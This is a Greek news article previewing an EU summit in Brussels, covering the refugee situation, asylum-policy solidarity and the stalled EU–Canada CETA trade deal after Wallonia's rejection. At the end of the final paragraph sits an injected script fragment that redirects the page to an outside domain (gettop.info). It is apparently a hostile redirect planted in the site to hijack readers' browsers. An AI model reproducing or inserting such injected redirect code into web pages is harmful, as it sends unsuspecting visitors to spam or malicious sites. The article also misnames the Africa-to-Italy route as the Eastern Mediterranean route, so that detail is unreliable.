Το προσφυγικό στο επίκεντρο της Συνόδου Κορυφής την Πέμπτη στις Βρυξέλλες

0
3

 

Οι τελευταίες εξελίξεις στο προσφυγικό καθώς και η ανάγκη για την επίτευξη ομοφωνίας σε ό,τι αφορά τα ζητήματα μεταναστευτικής πολιτικής της ΕΕ θα αποτελέσουν το πρώτο θέμα της Συνόδου Κορυφής που θα πραγματοποιηθεί την Πέμπτη και την Παρασκευή στις Βρυξέλλες.

Δεδομένου ότι οι αφίξεις στην Ελλάδα έχουν μειωθεί κατά 98% σε σχέση με το Σεπτέβριο του 2015, οι 28 αρχηγοί των κρατών και των κυβερνήσεων της ΕΕ, αναμένεται να επικεντρωθούν στη λεγόμενη διαδρομή της Ανατολικής Μεσογείου, η οποία αφορά κυρίως τις αφίξεις οικονομικών μεταναστών από την Αφρική στην Ιταλία. Ωστόσο, οι «28» αναμένεται να ζητήσουν την επιτάχυνση της διαδικασίας επιστροφής των μεταναστών από τα ελληνικά νησιά στην Τουρκία, αλλά και την αποστολή περισσότερων εμπειρογνωμόνων από τα κράτη μέλη στην Ελλάδα.

«Σε καμία περίπτωση δεν πρόκειται για μια ακόμα Σύνοδο «κρίσης»» ανέφερε σήμερα από τις Βρυξέλλες ανώτερος αξιωματούχος της ΕΕ, συμπληρώνοντας πως είναι ξεκάθαρο σε όλους ότι τα αποτελέσματα της μεταναστευτικής πολιτικής της ΕΕ είναι «επιτέλους» ορατά. Ο ίδιος επισήμανε πως από 150.000 που ήταν οι αφίξεις στα ελληνικά νησιά τον περασμένο Σεπτέμβριο, φέτος είναι μόλις 3.300.

Οι «28» αναμένεται επίσης να συζητήσουν και το ζήτημα της αλληλεγγύης μεταξύ των κρατών μελών, στο πλαίσιο της αναθεώρησης του Κοινού Ευρωπαϊκού Συστήματος Ασύλου και σε συνέχεια της Συνόδου των 27 στη Μπρατισλάβα, το Σεπτέμβριο. «Είναι ξεκάθαρο πως υπάρχει ανάγκη να χτιστεί μια ευρεία ομοφωνία σε σχέση με το τι σημαίνει ακριβώς αλληλεγγύη» υπογράμμισε ο ίδιος αξιωματούχος, προσθέτοντας ότι ο Σλοβάκος πρωθυπουργός, Ρόμπερτ Φίτσο αναμένεται να ενημερώσει τους ομολόγους του για την πρόοδο των συνομιλιών γι΄ αυτό το ζήτημα.

«Αργά ή γρήγορα θα πρέπει να βρούμε κάποιες λύσεις και να λάβουμε αποφάσεις. Στη Σύνοδο του Δεκεμβρίου θα επιστρέψουμε σε αυτό το ζήτημα. Άλλωστε, η ιδέα πίσω από τη Σύνοδο της Μπρατισλάβα ήταν ακριβώς να αποδείξουμε ότι δουλεύουμε μαζί» τόνισε ο αξιωματούχος.

Ανάμεσα στα πιο σημαντικά θέματα αυτής της Συνόδου Κορυφής, βρίσκεται και η εμπορική συμφωνία ΕΕ- Καναδά (CETA), το μέλλον της οποίας αναμένεται να συζητηθεί στη συνεδρίαση της Παρασκευής.

Σύμφωνα με πηγή της ΕΕ, μετά την απόρριψη της CETA από το κοινοβούλιο της Βαλονίας, ο στόχος του προέδρου του Ευρωπαϊκού Συμβουλίου, Ντόναλντ Τουσκ είναι να βρεθεί κατά τη διάρκεια της Συνόδου «ή στο περιθώριό της», όπως χαρακτηριστικά ανέφερε, μια «λύση ικανοποιητική για όλους, συμπεριλαμβανομένης της Βαλονίας».

Σημειώνεται, ότι στις 27-28 Οκτωβρίου θα πραγματοποιηθεί η Σύνοδος ΕΕ-Καναδά κατά την οποία είναι προγραμματισμένη η υπογραφή της συμφωνίας, γεγονός που -σύμφωνα με την ίδια πηγή- κάνει ιδιαιτέρως επείγουσα την επίτευξη συμφωνίας μεταξύ των «28», παρά την όποια διάσταση απόψεων.

«Είμαι πεπεισμένος ότι μαζί μπορούμε να συμφωνήσουμε σε μια εμπορική πολιτική που αντιμετωπίζει τις σημερινές ανησυχίες και τις προκλήσεις του αύριο. Αλλά αυτό εξαρτάται από την ικανότητά μας να προστατεύσουμε επαρκώς τον εαυτό μας και τους πολίτες μας, όταν ανακύπτουν αθέμιτες πρακτικές. Γιατί, για είναι το εμπόριο ελεύθερο, πρέπει να είναι και δίκαιο», αναφέρει χαρακτηριστικά ο πρόεδρος Τουσκ στην επίσημη πρόσκληση που απέστειλε σήμερα στους «28». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here